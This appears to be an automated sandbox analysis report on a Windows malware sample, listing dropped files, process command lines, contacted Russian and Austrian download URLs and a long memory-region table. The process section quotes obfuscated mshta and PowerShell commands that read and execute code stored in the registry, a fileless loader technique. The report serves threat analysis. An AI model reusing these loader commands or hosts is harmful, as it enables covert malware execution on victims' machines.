Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
main.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1b5r1h15.c2u.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmpv3qo3.pur.ps1
|
very short file (no magic)
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\main.exe
|
C:\Users\user\Desktop\main.exe
|
||
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe" "about:<hta:application><script>W6wy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(W6wy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value
iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTL_2FQEnly/Ec4VWBQYtx71qy/L2HNqAA4G4E5jKKRFVoEW/6ZRPruxEfWT04B4X/RInLDZAh2OnshBS/GAJBFuggBWOl74tiGq/C8U0bIGcG/njcGKLS7Hmxx_2FqYkMA/wXBdKE71rJ0_2BRnJ6T/_2FFCjuDuuyiRkDgNc2F1X/OAukSD8RvE3GZ/wJ754QUV/KLEyROfHTWgoSzopEA1Myxw/SpguZOW_2F2nhfCY/8gj9M.pct
|
134.0.118.203
|
||
http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHDTa4HSnc69/VTjN3cHS8admcsl/lF9YNNHT37IEBsIIb1/rPNHaRLKA/yV_2FpGJiuj5msF0n5k_/2B4wsxqrXszPC5OOTPn/esejfHBxrg5go2pgH4ag55/PJJdIY_2BXhg2/Jq5vcK1p/UgH0h5yEg5hXvdYJIEh70Vq/TQwvIFJaVN/s_2BVc_2FBWfsAcv7/_2BTZLbFDlWX/SnOSHCR0HAx/WLEPxneCpL/KSqopsC3x9/C.pct
|
134.0.118.203
|
||
http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS2eH2WFjOwUKnxF/cxRvetg60qsvZC3x78Y/lD8NfOdFnkiGuhR8EOmhwP/zT8fuhrHfJH2d/Ofv40l9W/oihnf9hyrxXMRyhNEU3WQZX/uHKMLk6j9C/xMwWNaKtBn_2BWbOV/iD6PRhU2TNKW/6JAfLIVGbXa/piHFabYjkWkLuD/5eut_2FYnEz3uc4kygTTM/g0YmfFvzjqwqIpvd/2xgKiml2FkDoBfu/2RWlPv_2/Bhf.pct
|
134.0.118.203
|
||
http://iujdhsndjfks.ru/
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QT
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://lentaphoto.at/uploaded/YLQQ1pvNQgsiX0/6uEpUTz0reRtkFusB_2Bb/kfn6D0FsL9WVZQdI/aUDJFCy515UVsdg/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuH
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
iujdhsndjfks.ru
|
134.0.118.203
|
||
lentaphoto.at
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
134.0.118.203
|
iujdhsndjfks.ru
|
Russian Federation
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
112F000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
1429000
|
heap
|
page read and write
|
||
CB9000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
13AA000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
12AC000
|
heap
|
page read and write
|
||
870000
|
heap
|
page read and write
|
||
1C0C1D83000
|
heap
|
page read and write
|
||
1FE4B039000
|
heap
|
page read and write
|
||
1C8C4112000
|
heap
|
page read and write
|
||
8C39DFF000
|
stack
|
page read and write
|
||
24B9F024000
|
heap
|
page read and write
|
||
265A8090000
|
trusted library allocation
|
page read and write
|
||
7FFBAE900000
|
trusted library allocation
|
page read and write
|
||
10CA7FB000
|
stack
|
page read and write
|
||
7FFBAE880000
|
trusted library allocation
|
page read and write
|
||
24B9F04E000
|
heap
|
page read and write
|
||
265C03F0000
|
heap
|
page read and write
|
||
265A64B0000
|
trusted library allocation
|
page read and write
|
||
20CBD402000
|
trusted library allocation
|
page read and write
|
||
8C39BFB000
|
stack
|
page read and write
|
||
20E3583C000
|
heap
|
page read and write
|
||
265C0840000
|
heap
|
page read and write
|
||
265C0839000
|
heap
|
page read and write
|
||
20E36122000
|
heap
|
page read and write
|
||
20E3583C000
|
heap
|
page read and write
|
||
265C085D000
|
heap
|
page read and write
|
||
1B82A64F000
|
heap
|
page read and write
|
||
265B810C000
|
trusted library allocation
|
page read and write
|
||
20E3598E000
|
heap
|
page read and write
|
||
1C0C1D5E000
|
heap
|
page read and write
|
||
20CBCE58000
|
heap
|
page read and write
|
||
20E35865000
|
heap
|
page read and write
|
||
7FB000
|
heap
|
page read and write
|
||
265A8090000
|
trusted library allocation
|
page read and write
|
||
1C8C4142000
|
heap
|
page read and write
|
||
7EA000
|
heap
|
page read and write
|
||
1FE4AE70000
|
heap
|
page read and write
|
||
2852E550000
|
remote allocation
|
page read and write
|
||
1FB1FA53000
|
heap
|
page read and write
|
||
172BE002000
|
trusted library allocation
|
page read and write
|
||
1C0C1D93000
|
heap
|
page read and write
|
||
265A9B2F000
|
trusted library allocation
|
page read and write
|
||
A94D67C000
|
stack
|
page read and write
|
||
1C0C1DBB000
|
heap
|
page read and write
|
||
20CBCE00000
|
heap
|
page read and write
|
||
265A8C64000
|
trusted library allocation
|
page read and write
|
||
1C0C1DAA000
|
heap
|
page read and write
|
||
265A8070000
|
trusted library allocation
|
page read and write
|
||
20E357F0000
|
heap
|
page read and write
|
||
1C0C1D9B000
|
heap
|
page read and write
|
||
104F000
|
stack
|
page read and write
|
||
1C0C1D2B000
|
heap
|
page read and write
|
||
265A8450000
|
trusted library allocation
|
page read and write
|
||
20E35813000
|
heap
|
page read and write
|
||
265A9FB8000
|
trusted library allocation
|
page read and write
|
||
1C8C621A000
|
trusted library allocation
|
page read and write
|
||
24B9F084000
|
heap
|
page read and write
|
||
24B9EFF0000
|
trusted library allocation
|
page read and write
|
||
51B1E7E000
|
stack
|
page read and write
|
||
20CBCE60000
|
heap
|
page read and write
|
||
265A65C0000
|
heap
|
page readonly
|
||
6D1000
|
unclassified section
|
page execute read
|
||
265A6500000
|
heap
|
page read and write
|
||
9D000
|
stack
|
page read and write
|
||
9338DAE000
|
stack
|
page read and write
|
||
24B9F06F000
|
heap
|
page read and write
|
||
BA0E37F000
|
stack
|
page read and write
|
||
1C0C1DAF000
|
heap
|
page read and write
|
||
24B9F065000
|
heap
|
page read and write
|
||
24B9F020000
|
heap
|
page read and write
|
||
1C0C1D9B000
|
heap
|
page read and write
|
||
BA0E87E000
|
stack
|
page read and write
|
||
108D000
|
stack
|
page read and write
|
||
265A8CA9000
|
trusted library allocation
|
page read and write
|
||
3760000
|
heap
|
page read and write
|
||
1C0C1D13000
|
heap
|
page read and write
|
||
265C04BC000
|
heap
|
page read and write
|
||
10C9EDB000
|
stack
|
page read and write
|
||
265C0445000
|
heap
|
page read and write
|
||
1C8C3994000
|
heap
|
page read and write
|
||
172BD835000
|
heap
|
page read and write
|
||
82414F7000
|
stack
|
page read and write
|
||
265A6470000
|
trusted library section
|
page read and write
|
||
1FE4B102000
|
heap
|
page read and write
|
||
265A8FBA000
|
trusted library allocation
|
page read and write
|
||
265C0855000
|
heap
|
page read and write
|
||
1C8C4147000
|
heap
|
page read and write
|
||
1FB1FA77000
|
heap
|
page read and write
|
||
1C0C1D1C000
|
heap
|
page read and write
|
||
7FFBAE980000
|
trusted library allocation
|
page read and write
|
||
265A7EC8000
|
heap
|
page read and write
|
||
1FE4AED0000
|
heap
|
page read and write
|
||
1C0C1DCB000
|
heap
|
page read and write
|
||
1C0C1DCA000
|
heap
|
page read and write
|
||
1C0C1D93000
|
heap
|
page read and write
|
||
1B82AB90000
|
trusted library allocation
|
page read and write
|
||
265A8090000
|
trusted library allocation
|
page read and write
|
||
9339478000
|
stack
|
page read and write
|
||
1C8C412B000
|
heap
|
page read and write
|
||
265A8070000
|
heap
|
page execute and read and write
|
||
1B82A3D0000
|
heap
|
page read and write
|
||
265A8090000
|
trusted library allocation
|
page read and write
|
||
82415FE000
|
stack
|
page read and write
|
||
1C8C40F0000
|
heap
|
page read and write
|
||
A94D57E000
|
stack
|
page read and write
|
||
BA0E6FA000
|
stack
|
page read and write
|
||
1C0C1D39000
|
heap
|
page read and write
|
||
20E36102000
|
heap
|
page read and write
|
||
1C0C1D6F000
|
heap
|
page read and write
|
||
2852CA46000
|
heap
|
page read and write
|
||
2852CA02000
|
heap
|
page read and write
|
||
7FFBAE8D0000
|
trusted library allocation
|
page read and write
|
||
265A9D56000
|
trusted library allocation
|
page read and write
|
||
265C083E000
|
heap
|
page read and write
|
||
265A9D41000
|
trusted library allocation
|
page read and write
|
||
682297D000
|
stack
|
page read and write
|
||
2852CA2A000
|
heap
|
page read and write
|
||
172BD829000
|
heap
|
page read and write
|
||
265B80C1000
|
trusted library allocation
|
page read and write
|
||
265A8094000
|
trusted library allocation
|
page read and write
|
||
1C0C1DAF000
|
heap
|
page read and write
|
||
59B000
|
stack
|
page read and write
|
||
3670000
|
trusted library allocation
|
page read and write
|
||
20E36200000
|
heap
|
page read and write
|
||
7FFBAE8E0000
|
trusted library allocation
|
page read and write
|
||
1C0C1DAF000
|
heap
|
page read and write
|
||
1C8C410F000
|
heap
|
page read and write
|
||
824204F000
|
stack
|
page read and write
|
||
265A651B000
|
heap
|
page read and write
|
||
14AC000
|
heap
|
page read and write
|
||
366E000
|
trusted library allocation
|
page read and write
|
||
1FE4B030000
|
heap
|
page read and write
|
||
93393F7000
|
stack
|
page read and write
|
||
1C0C1DC8000
|
heap
|
page read and write
|
||
1C8C3E52000
|
heap
|
page read and write
|
||
1C0C1DB2000
|
heap
|
page read and write
|
||
265A9B5A000
|
trusted library allocation
|
page read and write
|
||
265A8090000
|
trusted library allocation
|
page read and write
|
||
1C0C1D84000
|
heap
|
page read and write
|
||
1C0C1D55000
|
heap
|
page read and write
|
||
68226FE000
|
stack
|
page read and write
|
||
19C000
|
stack
|
page read and write
|
||
1C8C3E65000
|
heap
|
page read and write
|
||
2852CB18000
|
heap
|
page read and write
|
||
A94CAFC000
|
stack
|
page read and write
|
||
1C0C1D8A000
|
heap
|
page read and write
|
||
8C3968C000
|
stack
|
page read and write
|
||
7DF47C080000
|
trusted library allocation
|
page execute and read and write
|
||
817000
|
heap
|
page read and write
|
||
265C0860000
|
heap
|
page read and write
|
||
1456000
|
heap
|
page read and write
|
||
1C8C4147000
|
heap
|
page read and write
|
||
172BD902000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
1B82A6BA000
|
heap
|
page read and write
|
||
265C0500000
|
trusted library allocation
|
page read and write
|
||
20E35882000
|
heap
|
page read and write
|
||
172BD7C0000
|
heap
|
page read and write
|
||
20E35F70000
|
trusted library allocation
|
page read and write
|
||
1C0C35B0000
|
heap
|
page read and write
|
||
1C8C6211000
|
trusted library allocation
|
page read and write
|
||
20E36122000
|
heap
|
page read and write
|
||
20CBD3A0000
|
trusted library allocation
|
page read and write
|
||
20CBCBD0000
|
heap
|
page read and write
|
||
BFFC2FE000
|
stack
|
page read and write
|
||
172BDF50000
|
remote allocation
|
page read and write
|
||
1C0C1D81000
|
heap
|
page read and write
|
||
7FFBAE8B0000
|
trusted library allocation
|
page read and write
|
||
844000
|
heap
|
page read and write
|
||
1C0C1C70000
|
heap
|
page read and write
|
||
1C0C1D9F000
|
heap
|
page read and write
|
||
1FB1FA5A000
|
heap
|
page read and write
|
||
7FF000
|
heap
|
page read and write
|
||
172BD7F0000
|
trusted library allocation
|
page read and write
|
||
1C0C1D8D000
|
heap
|
page read and write
|
||
265C04AC000
|
heap
|
page read and write
|
||
2852E550000
|
remote allocation
|
page read and write
|
||
2852CA62000
|
heap
|
page read and write
|
||
265C0834000
|
heap
|
page read and write
|
||
20E36223000
|
heap
|
page read and write
|
||
BFFC1FE000
|
stack
|
page read and write
|
||
82419FF000
|
stack
|
page read and write
|
||
1C0C1D8C000
|
heap
|
page read and write
|
||
172BD840000
|
heap
|
page read and write
|
||
265A9D39000
|
trusted library allocation
|
page read and write
|
||
1C8C4139000
|
heap
|
page read and write
|
||
20E36230000
|
heap
|
page read and write
|
||
20E361B0000
|
heap
|
page read and write
|
||
265A6480000
|
trusted library section
|
page read and write
|
||
1FE4B052000
|
heap
|
page read and write
|
||
265C0860000
|
heap
|
page read and write
|
||
1B82AC02000
|
heap
|
page read and write
|
||
3718000
|
trusted library allocation
|
page read and write
|
||
265A657B000
|
heap
|
page read and write
|
||
1C8C4147000
|
heap
|
page read and write
|
||
1C8C4142000
|
heap
|
page read and write
|
||
1B82A629000
|
heap
|
page read and write
|
||
265A9B37000
|
trusted library allocation
|
page read and write
|
||
1FB1FB02000
|
heap
|
page read and write
|
||
A94D27E000
|
stack
|
page read and write
|
||
265A8090000
|
trusted library allocation
|
page read and write
|
||
5C5000
|
heap
|
page read and write
|
||
172BD802000
|
heap
|
page read and write
|
||
20E36154000
|
heap
|
page read and write
|
||
24B9F07D000
|
heap
|
page read and write
|
||
1C8C4139000
|
heap
|
page read and write
|
||
1FB1FA67000
|
heap
|
page read and write
|
||
93392FF000
|
stack
|
page read and write
|
||
1C8C4139000
|
heap
|
page read and write
|
||
265A9AE0000
|
trusted library allocation
|
page read and write
|
||
1FB1FA3D000
|
heap
|
page read and write
|
||
395F000
|
stack
|
page read and write
|
||
1C0C1DB2000
|
heap
|
page read and write
|
||
265A80A5000
|
heap
|
page read and write
|
||
265C047C000
|
heap
|
page read and write
|
||
1C0C1D09000
|
heap
|
page read and write
|
||
365F000
|
stack
|
page read and write
|
||
20E35885000
|
heap
|
page read and write
|
||
1C0C3644000
|
heap
|
page read and write
|
||
2852CB02000
|
heap
|
page read and write
|
||
D5E000
|
trusted library allocation
|
page read and write
|
||
10CA67B000
|
stack
|
page read and write
|
||
BA0E5FF000
|
stack
|
page read and write
|
||
7FFBAE875000
|
trusted library allocation
|
page read and write
|
||
24B9EE80000
|
heap
|
page read and write
|
||
265A8090000
|
trusted library allocation
|
page read and write
|
||
E17000
|
trusted library allocation
|
page read and write
|
||
2852CA3D000
|
heap
|
page read and write
|
||
1B82A6CB000
|
heap
|
page read and write
|
||
75E000
|
stack
|
page read and write
|
||
2852CA00000
|
heap
|
page read and write
|
||
265C0464000
|
heap
|
page read and write
|
||
1C0C364D000
|
heap
|
page read and write
|
||
24B9F075000
|
heap
|
page read and write
|
||
265A62C0000
|
heap
|
page read and write
|
||
1C8C4139000
|
heap
|
page read and write
|
||
BFFC4FF000
|
stack
|
page read and write
|
||
7FFBAE860000
|
trusted library allocation
|
page read and write
|
||
1C8C4147000
|
heap
|
page read and write
|
||
2852CB1B000
|
heap
|
page read and write
|
||
35219FE000
|
stack
|
page read and write
|
||
265B832B000
|
trusted library allocation
|
page read and write
|
||
1C0C1DA3000
|
heap
|
page read and write
|
||
BFFC3FD000
|
stack
|
page read and write
|
||
1C0C1D88000
|
heap
|
page read and write
|
||
33DA000
|
stack
|
page read and write
|
||
20E359E5000
|
heap
|
page read and write
|
||
265A8090000
|
trusted library allocation
|
page read and write
|
||
3660000
|
trusted library allocation
|
page read and write
|
||
682247B000
|
stack
|
page read and write
|
||
24B9F048000
|
heap
|
page read and write
|
||
24B9EE90000
|
heap
|
page read and write
|
||
265A8CD4000
|
trusted library allocation
|
page read and write
|
||
1C0C1D3A000
|
heap
|
page read and write
|
||
1B82A686000
|
heap
|
page read and write
|
||
265C0912000
|
heap
|
page read and write
|
||
10CAAFC000
|
stack
|
page read and write
|
||
BFFC0FD000
|
stack
|
page read and write
|
||
265A6450000
|
heap
|
page read and write
|
||
2852C9A0000
|
heap
|
page read and write
|
||
1C8C4143000
|
heap
|
page read and write
|
||
265A6508000
|
heap
|
page read and write
|
||
1FB1F790000
|
heap
|
page read and write
|
||
24B9F059000
|
heap
|
page read and write
|
||
68229FF000
|
stack
|
page read and write
|
||
265A8090000
|
trusted library allocation
|
page read and write
|
||
BFFC5FF000
|
stack
|
page read and write
|
||
7FFBAE970000
|
trusted library allocation
|
page read and write
|
||
265C0810000
|
heap
|
page read and write
|
||
682287F000
|
stack
|
page read and write
|
||
1C8C4142000
|
heap
|
page read and write
|
||
1B82A63D000
|
heap
|
page read and write
|
||
265A64C0000
|
heap
|
page read and write
|
||
1C8C3C60000
|
heap
|
page read and write
|
||
870000
|
heap
|
page read and write
|
||
1C0C1C9D000
|
heap
|
page read and write
|
||
24B9F068000
|
heap
|
page read and write
|
||
1FB1FA8D000
|
heap
|
page read and write
|
||
1C8C412B000
|
heap
|
page read and write
|
||
2852CB13000
|
heap
|
page read and write
|
||
24B9F06A000
|
heap
|
page read and write
|
||
265A8BFE000
|
trusted library allocation
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
1C8C4139000
|
heap
|
page read and write
|
||
265A9B40000
|
trusted library allocation
|
page read and write
|
||
1C8C3E65000
|
heap
|
page read and write
|
||
1C8C4130000
|
heap
|
page read and write
|
||
870000
|
heap
|
page read and write
|
||
1C8C3E65000
|
heap
|
page read and write
|
||
2852C940000
|
heap
|
page read and write
|
||
1FB1FA64000
|
heap
|
page read and write
|
||
265C05C0000
|
heap
|
page execute and read and write
|
||
1C0C1D7B000
|
heap
|
page read and write
|
||
1B82AD3A000
|
heap
|
page read and write
|
||
1C0C1D81000
|
heap
|
page read and write
|
||
406000
|
unkown
|
page readonly
|
||
1C0C1D09000
|
heap
|
page read and write
|
||
1C0C1D8A000
|
heap
|
page read and write
|
||
1C0C1DC8000
|
heap
|
page read and write
|
||
20CBCBE0000
|
heap
|
page read and write
|
||
6822C7D000
|
stack
|
page read and write
|
||
1C8C6235000
|
trusted library allocation
|
page read and write
|
||
7FFBAE7E2000
|
trusted library allocation
|
page read and write
|
||
20E361C6000
|
heap
|
page read and write
|
||
933A083000
|
stack
|
page read and write
|
||
BFFBFFB000
|
stack
|
page read and write
|
||
BA0E07B000
|
stack
|
page read and write
|
||
A94D37C000
|
stack
|
page read and write
|
||
1C8C3E50000
|
heap
|
page read and write
|
||
1C0C1D6A000
|
heap
|
page read and write
|
||
F4C000
|
stack
|
page read and write
|
||
20E36190000
|
heap
|
page read and write
|
||
10CA9FE000
|
stack
|
page read and write
|
||
20E35876000
|
heap
|
page read and write
|
||
796000
|
heap
|
page read and write
|
||
1C8C6224000
|
trusted library allocation
|
page read and write
|
||
8BE000
|
stack
|
page read and write
|
||
1C0C1DBB000
|
heap
|
page read and write
|
||
1B82AD00000
|
heap
|
page read and write
|
||
93391FF000
|
stack
|
page read and write
|
||
BA0E4F9000
|
stack
|
page read and write
|
||
1C8C3E87000
|
heap
|
page read and write
|
||
265C090A000
|
heap
|
page read and write
|
||
20E35873000
|
heap
|
page read and write
|
||
20CBCE40000
|
heap
|
page read and write
|
||
1B82A430000
|
heap
|
page read and write
|
||
1FE4B025000
|
heap
|
page read and write
|
||
3521BFF000
|
stack
|
page read and write
|
||
7FFBAE760000
|
trusted library allocation
|
page execute and read and write
|
||
1C8C4112000
|
heap
|
page read and write
|
||
265A8CBB000
|
trusted library allocation
|
page read and write
|
||
1C8C3E51000
|
heap
|
page read and write
|
||
1C0C1D8A000
|
heap
|
page read and write
|
||
1C8C4129000
|
heap
|
page read and write
|
||
7FFBAE9B0000
|
trusted library allocation
|
page read and write
|
||
24B9F03C000
|
heap
|
page read and write
|
||
24B9F061000
|
heap
|
page read and write
|
||
20E3616D000
|
heap
|
page read and write
|
||
24B9F060000
|
heap
|
page read and write
|
||
265A80A0000
|
heap
|
page read and write
|
||
24B9F074000
|
heap
|
page read and write
|
||
1C0C1DAF000
|
heap
|
page read and write
|
||
1C8C410F000
|
heap
|
page read and write
|
||
265C045E000
|
heap
|
page read and write
|
||
BA0E27A000
|
stack
|
page read and write
|
||
1C0C1D39000
|
heap
|
page read and write
|
||
10B0000
|
heap
|
page read and write
|
||
24B9F031000
|
heap
|
page read and write
|
||
20CBCC40000
|
heap
|
page read and write
|
||
900000
|
heap
|
page read and write
|
||
9338DEE000
|
stack
|
page read and write
|
||
24B9F022000
|
heap
|
page read and write
|
||
24B9F05A000
|
heap
|
page read and write
|
||
1C0C1D9C000
|
heap
|
page read and write
|
||
1C0C1D8A000
|
heap
|
page read and write
|
||
7FFBAE650000
|
trusted library allocation
|
page read and write
|
||
2852CA13000
|
heap
|
page read and write
|
||
265A65E0000
|
trusted library allocation
|
page read and write
|
||
1C0C1D86000
|
heap
|
page read and write
|
||
A94CEFF000
|
stack
|
page read and write
|
||
20CBCE68000
|
heap
|
page read and write
|
||
24B9F05D000
|
heap
|
page read and write
|
||
265A6542000
|
heap
|
page read and write
|
||
788000
|
heap
|
page read and write
|
||
1C0C1D6F000
|
heap
|
page read and write
|
||
3761000
|
heap
|
page read and write
|
||
24B9F057000
|
heap
|
page read and write
|
||
1C8C4142000
|
heap
|
page read and write
|
||
7FFBAE950000
|
trusted library allocation
|
page read and write
|
||
265C083D000
|
heap
|
page read and write
|
||
265C0860000
|
heap
|
page read and write
|
||
1C0C1DC8000
|
heap
|
page read and write
|
||
1C0C1D86000
|
heap
|
page read and write
|
||
24B9F058000
|
heap
|
page read and write
|
||
265A8090000
|
trusted library allocation
|
page read and write
|
||
1196000
|
heap
|
page read and write
|
||
1C8C412B000
|
heap
|
page read and write
|
||
1C8C4112000
|
heap
|
page read and write
|
||
265A8CB2000
|
trusted library allocation
|
page read and write
|
||
24B9F041000
|
heap
|
page read and write
|
||
1C0C1C50000
|
heap
|
page read and write
|
||
1C0C1DC8000
|
heap
|
page read and write
|
||
8241BFC000
|
stack
|
page read and write
|
||
7F6000
|
heap
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
7FD000
|
heap
|
page read and write
|
||
38E9000
|
trusted library allocation
|
page read and write
|
||
2852CA88000
|
heap
|
page read and write
|
||
265A6710000
|
heap
|
page read and write
|
||
1429000
|
heap
|
page read and write
|
||
265C0860000
|
heap
|
page read and write
|
||
20E35913000
|
heap
|
page read and write
|
||
24B9F067000
|
heap
|
page read and write
|
||
172BD760000
|
heap
|
page read and write
|
||
24B9F802000
|
trusted library allocation
|
page read and write
|
||
265A9D4E000
|
trusted library allocation
|
page read and write
|
||
1C0C1DB2000
|
heap
|
page read and write
|
||
1C8C4129000
|
heap
|
page read and write
|
||
E09000
|
trusted library allocation
|
page read and write
|
||
1B82A613000
|
heap
|
page read and write
|
||
7FFBAE910000
|
trusted library allocation
|
page read and write
|
||
265A80FF000
|
trusted library allocation
|
page read and write
|
||
1FB1FA70000
|
heap
|
page read and write
|
||
265A8C95000
|
trusted library allocation
|
page read and write
|
||
1FB1FB13000
|
heap
|
page read and write
|
||
7FFBAE810000
|
trusted library allocation
|
page execute and read and write
|
||
1C0C1D76000
|
heap
|
page read and write
|
||
10CABFE000
|
stack
|
page read and write
|
||
1C0C1D88000
|
heap
|
page read and write
|
||
265C0510000
|
trusted library allocation
|
page read and write
|
||
2852E602000
|
trusted library allocation
|
page read and write
|
||
93390FF000
|
stack
|
page read and write
|
||
1C0C1D7B000
|
heap
|
page read and write
|
||
20E36213000
|
heap
|
page read and write
|
||
24B9F013000
|
heap
|
page read and write
|
||
BA0E47B000
|
stack
|
page read and write
|
||
D60000
|
trusted library allocation
|
page read and write
|
||
7FFBAE7F4000
|
trusted library allocation
|
page read and write
|
||
6D0000
|
unclassified section
|
page read and write
|
||
7F1000
|
heap
|
page read and write
|
||
1C0C1D9B000
|
heap
|
page read and write
|
||
265C04F0000
|
trusted library allocation
|
page read and write
|
||
20E35829000
|
heap
|
page read and write
|
||
265A8090000
|
trusted library allocation
|
page read and write
|
||
1C0C1DB2000
|
heap
|
page read and write
|
||
20E3582C000
|
heap
|
page read and write
|
||
1C0C1D83000
|
heap
|
page read and write
|
||
1C0C1C90000
|
heap
|
page read and write
|
||
6DC000
|
unclassified section
|
page readonly
|
||
1B82A64A000
|
heap
|
page read and write
|
||
20E36100000
|
heap
|
page read and write
|
||
20CBCF13000
|
heap
|
page read and write
|
||
6D9000
|
unclassified section
|
page readonly
|
||
14AB000
|
heap
|
page read and write
|
||
1C0C1DCD000
|
heap
|
page read and write
|
||
20E36002000
|
heap
|
page read and write
|
||
1C0C1DC8000
|
heap
|
page read and write
|
||
760000
|
heap
|
page read and write
|
||
2852C930000
|
heap
|
page read and write
|
||
351F000
|
stack
|
page read and write
|
||
1C0C1D10000
|
heap
|
page read and write
|
||
93396FB000
|
stack
|
page read and write
|
||
2852CA7F000
|
heap
|
page read and write
|
||
1FB1FA8A000
|
heap
|
page read and write
|
||
7FFBAE8D7000
|
trusted library allocation
|
page read and write
|
||
1C0C1D93000
|
heap
|
page read and write
|
||
3521AFA000
|
stack
|
page read and write
|
||
1C0C1DC8000
|
heap
|
page read and write
|
||
933917D000
|
stack
|
page read and write
|
||
20E359B9000
|
heap
|
page read and write
|
||
2852CB00000
|
heap
|
page read and write
|
||
82416FE000
|
stack
|
page read and write
|
||
1C0C1D2B000
|
heap
|
page read and write
|
||
309F000
|
stack
|
page read and write
|
||
1C0C1D8C000
|
heap
|
page read and write
|
||
20CBCF02000
|
heap
|
page read and write
|
||
3727000
|
trusted library allocation
|
page read and write
|
||
1C0C1CD0000
|
heap
|
page read and write
|
||
80F000
|
heap
|
page read and write
|
||
20E3588A000
|
heap
|
page read and write
|
||
1C0C1D7B000
|
heap
|
page read and write
|
||
3661000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
265A82B4000
|
trusted library allocation
|
page read and write
|
||
7FFBAE644000
|
trusted library allocation
|
page read and write
|
||
3768000
|
trusted library allocation
|
page read and write
|
||
3766000
|
trusted library allocation
|
page read and write
|
||
2852CA47000
|
heap
|
page read and write
|
||
265A80B1000
|
trusted library allocation
|
page read and write
|
||
20CBCE64000
|
heap
|
page read and write
|
||
265A8D5B000
|
trusted library allocation
|
page read and write
|
||
1C8C4139000
|
heap
|
page read and write
|
||
265C0860000
|
heap
|
page read and write
|
||
172BDF50000
|
remote allocation
|
page read and write
|
||
355E000
|
stack
|
page read and write
|
||
2852C9F0000
|
trusted library allocation
|
page read and write
|
||
1C8C4139000
|
heap
|
page read and write
|
||
1C0C1D6A000
|
heap
|
page read and write
|
||
1FE4B013000
|
heap
|
page read and write
|
||
404000
|
unkown
|
page read and write
|
||
1C0C1DB2000
|
heap
|
page read and write
|
||
20E36202000
|
heap
|
page read and write
|
||
20CBCE79000
|
heap
|
page read and write
|
||
265A6490000
|
trusted library allocation
|
page read and write
|
||
1C0C1D1F000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
1C0C1D81000
|
heap
|
page read and write
|
||
1C8C6245000
|
trusted library allocation
|
page read and write
|
||
265A8097000
|
trusted library allocation
|
page read and write
|
||
265A65D0000
|
heap
|
page read and write
|
||
682277E000
|
stack
|
page read and write
|
||
1C0C1D93000
|
heap
|
page read and write
|
||
265A8094000
|
trusted library allocation
|
page read and write
|
||
1C0C1D9B000
|
heap
|
page read and write
|
||
265A8090000
|
trusted library allocation
|
page read and write
|
||
10CA4FF000
|
stack
|
page read and write
|
||
2852CA57000
|
heap
|
page read and write
|
||
1C8C6215000
|
trusted library allocation
|
page read and write
|
||
